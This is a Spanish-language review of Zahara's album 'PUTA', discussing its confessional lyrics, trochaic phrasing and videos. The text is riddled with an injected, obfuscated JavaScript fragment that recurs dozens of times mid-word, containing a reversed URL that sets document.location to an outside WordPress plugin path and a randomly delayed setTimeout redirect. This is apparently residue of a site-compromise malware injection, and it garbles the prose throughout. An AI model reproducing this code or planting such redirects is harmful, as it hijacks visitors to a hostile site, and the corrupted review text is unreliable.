PUTA, ZAHARA

    zahara11

    Desde que Vasari inventase la biografía artística en el siglo XVI, la vida es tan importante como la obra, y en ocasiones, no es que sea más relevante sino que directamente, la obra no se entiende sin el elementoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to vital.

    En plena era del yo y las psicoterapias, una serie de vectoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tores convergen y dan justoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to en el centro de la diana emocional. Y bienvenidos sean puestoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to que abren una puerta que verdaderamente cumple una función. Residente ya nos emocionó hasta la médula con “René” y, hace unos meses, Adele se abrió en canal en su “30”, su álbum de “divorcio”.

    Las letras, la confesión, la brutalidad del yo expuestoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to para uso de una audiencia que mira y analiza buscando claves, porque cree profundamente en la noción de arte como encarnación de la personalidad del artista.

    Lo poderoso de temas como “MERICHANE” es el fraseo que usa una corchea por sílaba y así, tirando del hilo del ritmo trocaico (Fuerte-débil), logran salir del laberintoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to y condensa mucha información en cada frase. Gracias a la gran cantidad de palabras llanas que hay en castellano, ese ritmo funciona a la perfección, En inglés, es al revés, y se emplea más a menudo el conocido pentámetro yámbico (débil-fuerte) que tantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to usó Shakespeare, y los artistas de blues y hip hop.

    Letras en forma de diario íntimo que cortan como un cuchillo para destripar una larga lista de agravios y ajustes de cuentas, sobre el pálido gris de los sintetizadores. Además -y estoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to no se puede obviarse-, esta verosimilitud se apuntala con una serie de vídeoclips muy bien trabajados y unas entrevistas de corte confesional que dotan de fuerza a toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}todo el discurso sin fisuras. Los textoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tos, que han gozado de toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}total rienda suelta, se ven también acompañado una liberación generosa en la parte musical que alcanza sus mejores momentoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tos en temas como “berlín U5” o “joker”.

    “PUTA” ha captado una serie de problemas latentes en la sociedad y les ha puestoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to voz, música e imagen. Hasta el título es adecuado, ya que emplea el insultoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to individual como autoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toennoblecimientoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to y respuesta colectiva. “Puta” es el disco que demuestra que nuestro don como seres humanos es la capacidad de nombrar y narrar. Hay discos que llegan antes de tiempo, otros fuera de tiempo y, éste, en el momentoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to perfectoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to. Zeitgeist.

    PUTA está editado por G.O.Z.Z. Records 

    #finalistaspremioruido2021